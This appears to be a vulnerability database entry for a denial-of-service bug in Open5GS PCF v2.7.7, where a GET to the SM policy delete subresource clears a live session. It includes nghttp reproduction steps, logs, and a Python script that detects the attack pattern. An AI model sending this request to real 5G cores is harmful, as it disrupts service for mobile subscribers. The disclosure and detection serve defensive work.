| Title | Open5gs PCF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
PCF incorrectly dispatches the `/sm-policies/{smPolicyId}/delete` subresource to
the SM policy delete handler without checking the HTTP method.
Unlike the app-session bug, the delete handler here expects a
`SmPolicyDeleteData` body. A plain `GET` therefore fails inside
`pcf_npcf_smpolicycontrol_handle_delete()`, and the failure is escalated into a
state-machine exception. The top-level PCF FSM then clears the entire session
context via `PCF_SESS_CLEAR(sess)`.
So an attacker with a valid `smPolicyId` can destroy the PCF session state
using only `GET /.../delete`, even though the route should require a `POST`
with a valid delete body.
### Root cause
Method-confused dispatch:
- `src/pcf/sm-sm.c:91-99`
Delete handler rejects missing body:
- `src/pcf/npcf-handler.c:569-574`
Failure escalated to session exception and clear:
- `src/pcf/sm-sm.c:95-99`
- `src/pcf/pcf-sm.c:283-288`
- `src/pcf/context.h:89-99` (`PCF_SESS_CLEAR`)
The sibling route without `/delete` behaves correctly:
- `GET /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}` returns `405`
and leaves the session intact.
### Steps to reproduce
This live repro used an existing `sm-policy` resource:
```text
location: http://pcf.open5gs.org/npcf-smpolicycontrol/v1/sm-policies/1
```
1. Control request:
```bash
IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' pcf)
nghttp -v "http://$IP/npcf-smpolicycontrol/v1/sm-policies/1"
```
2. Probe that the session still exists by creating an app-session on the same
UE IPv4:
```bash
cat >/tmp/policyauth_logic_create.json <<'EOF'
{"ascReqData":{"suppFeat":"1","notifUri":"http://10.33.33.1:18081/af-callback","ueIpv4":"10.45.0.2","medComponents":{"1":{"medCompN":1,"medType":"AUDIO","medSubComps":{"1":{"fNum":1,"fDescs":["permit out"],"flowUsage":"NO_INFO"}}}}}}
EOF
nghttp -v -H':method: POST' -H'content-type: application/json' \
-d /tmp/policyauth_logic_create.json \
"http://$IP/npcf-policyauthorization/v1/app-sessions"
```
3. Attack request:
```bash
nghttp -v "http://$IP/npcf-smpolicycontrol/v1/sm-policies/1/delete"
```
4. Probe the same UE/session again:
```bash
nghttp -v -H':method: POST' -H'content-type: application/json' \
-d /tmp/policyauth_logic_create.json \
"http://$IP/npcf-policyauthorization/v1/app-sessions"
```
### Logs
```text
Control path:
GET /npcf-smpolicycontrol/v1/sm-policies/1 -> HTTP/2 405
{"title":"Invalid HTTP method","status":405,...}
The session still existed:
POST /npcf-policyauthorization/v1/app-sessions -> HTTP/2 201
Attack path:
GET /npcf-smpolicycontrol/v1/sm-policies/1/delete -> HTTP/2 400
{"title":"[imsi-001011234567891:1] No SmPolicyDeleteData","status":400,...}
But the `400` also destroyed the session context. The same app-session create
probe immediately changed to:
POST /npcf-policyauthorization/v1/app-sessions -> HTTP/2 404
{"title":"Not found","status":404,...}
PCF logs:
[imsi-001011234567891:1] No SmPolicyDeleteData
[imsi-001011234567891:1] pcf_npcf_smpolicycontrol_handle_delete() failed
[Unknown:1] State machine exception
Not found [/npcf-policyauthorization/v1/app-sessions]
```
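For anyone monitoring a PCF for this pattern, the following is an added detection example; it is not code from the report or from Open5GS. It runs over two constructed inputs: a PCF log excerpt modelled on the lines quoted above, and a list of SBI access records in an assumed `(method, path, status)` shape (how an SBI proxy or your own access logging records requests is deployment-specific). It flags a non-`POST` hitting the `/sm-policies/{smPolicyId}/delete` subresource, pairs a failed `pcf_npcf_smpolicycontrol_handle_delete()` with the `State machine exception` that follows it, and reproduces the report's own before/after probe logic (app-session create goes from `201` to `404` across the attack request).

```python
import re
from dataclasses import dataclass

# Constructed PCF log excerpt, modelled on the lines quoted in the report.
SAMPLE_PCF_LOG = """\
[imsi-001011234567891:1] No SmPolicyDeleteData
[imsi-001011234567891:1] pcf_npcf_smpolicycontrol_handle_delete() failed
[Unknown:1] State machine exception
Not found [/npcf-policyauthorization/v1/app-sessions]
"""

# Constructed SBI access records (method, path, status). The record shape is
# an assumption; adapt the loader to whatever your SBI proxy or PCF emits.
SAMPLE_ACCESS = [
    ("GET", "/npcf-smpolicycontrol/v1/sm-policies/1", 405),
    ("POST", "/npcf-policyauthorization/v1/app-sessions", 201),
    ("GET", "/npcf-smpolicycontrol/v1/sm-policies/1/delete", 400),
    ("POST", "/npcf-policyauthorization/v1/app-sessions", 404),
]

APP_SESSIONS = "/npcf-policyauthorization/v1/app-sessions"
DELETE_SUBRESOURCE = re.compile(
    r"^/npcf-smpolicycontrol/v1/sm-policies/(?P<id>[^/]+)/delete/?$")
HANDLE_DELETE_FAILED = re.compile(
    r"^\[(?P<key>[^\]]+)\] pcf_npcf_smpolicycontrol_handle_delete\(\) failed$")


@dataclass
class Finding:
    kind: str
    detail: str


def method_confused_requests(records):
    """Flag any non-POST request to the sm-policies delete subresource.
    The report's expected behaviour is that only POST with a delete body is
    valid here, so anything else is a buggy client or this probe."""
    findings = []
    for method, path, status in records:
        m = DELETE_SUBRESOURCE.match(path)
        if m and method.upper() != "POST":
            findings.append(Finding(
                "method-confused-delete",
                f"{method} {path} -> {status} (smPolicyId={m['id']})"))
    return findings


def escalated_delete_failures(log_text):
    """Pair a failed handle_delete() with the State machine exception that
    follows it; that pairing is the session-clearing escalation the report
    describes, as opposed to a plain 400 returned to the client."""
    findings = []
    pending = None
    for line in log_text.splitlines():
        m = HANDLE_DELETE_FAILED.match(line)
        if m:
            pending = m["key"]
            continue
        if pending and "State machine exception" in line:
            findings.append(Finding(
                "session-cleared",
                f"session {pending} cleared after failed delete: {line}"))
            pending = None
    return findings


def session_lost_after_probe(records):
    """Reproduce the report's probe: the same app-session create succeeded
    (201) before the method-confused delete request and returns 404 after it.
    Returns True when that before/after flip is present."""
    seen_create_ok = False
    seen_attack = False
    for method, path, status in records:
        if method.upper() == "POST" and path == APP_SESSIONS:
            if not seen_attack and status == 201:
                seen_create_ok = True
            elif seen_attack and seen_create_ok and status == 404:
                return True
        elif DELETE_SUBRESOURCE.match(path) and method.upper() != "POST":
            seen_attack = True
    return False


if __name__ == "__main__":
    for f in method_confused_requests(SAMPLE_ACCESS):
        print(f.kind, f.detail)
    for f in escalated_delete_failures(SAMPLE_PCF_LOG):
        print(f.kind, f.detail)
    print("session lost after probe:", session_lost_after_probe(SAMPLE_ACCESS))
```

The access-record check alone is enough to alert on the attack request itself; the log pairing is what distinguishes a harmless `400` from one that tore down the session, so keep both when tuning the rule.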
### Expected behaviour
`GET /sm-policies/{smPolicyId}/delete` should be rejected as an invalid method and must not alter session state.
### Observed Behaviour
The `GET` request is routed into delete handling, fails on missing body, and the resulting exception clears the whole PCF session context.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Source | https://github.com/open5gs/open5gs/issues/4440 |
|---|
| User | LinZiyu (UID 94035) |
|---|
| Submitted | 2026-04-20 20:38 (1 month ago) |
|---|
| Moderation | 2026-05-09 09:35 (19 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 362442 [Open5GS up to 2.7.7 delete Endpoint src/pcf/sm-sm.c pcf_npcf_smpolicycontrol_handle_delete denial of service] |
|---|
| Points | 20 |
|---|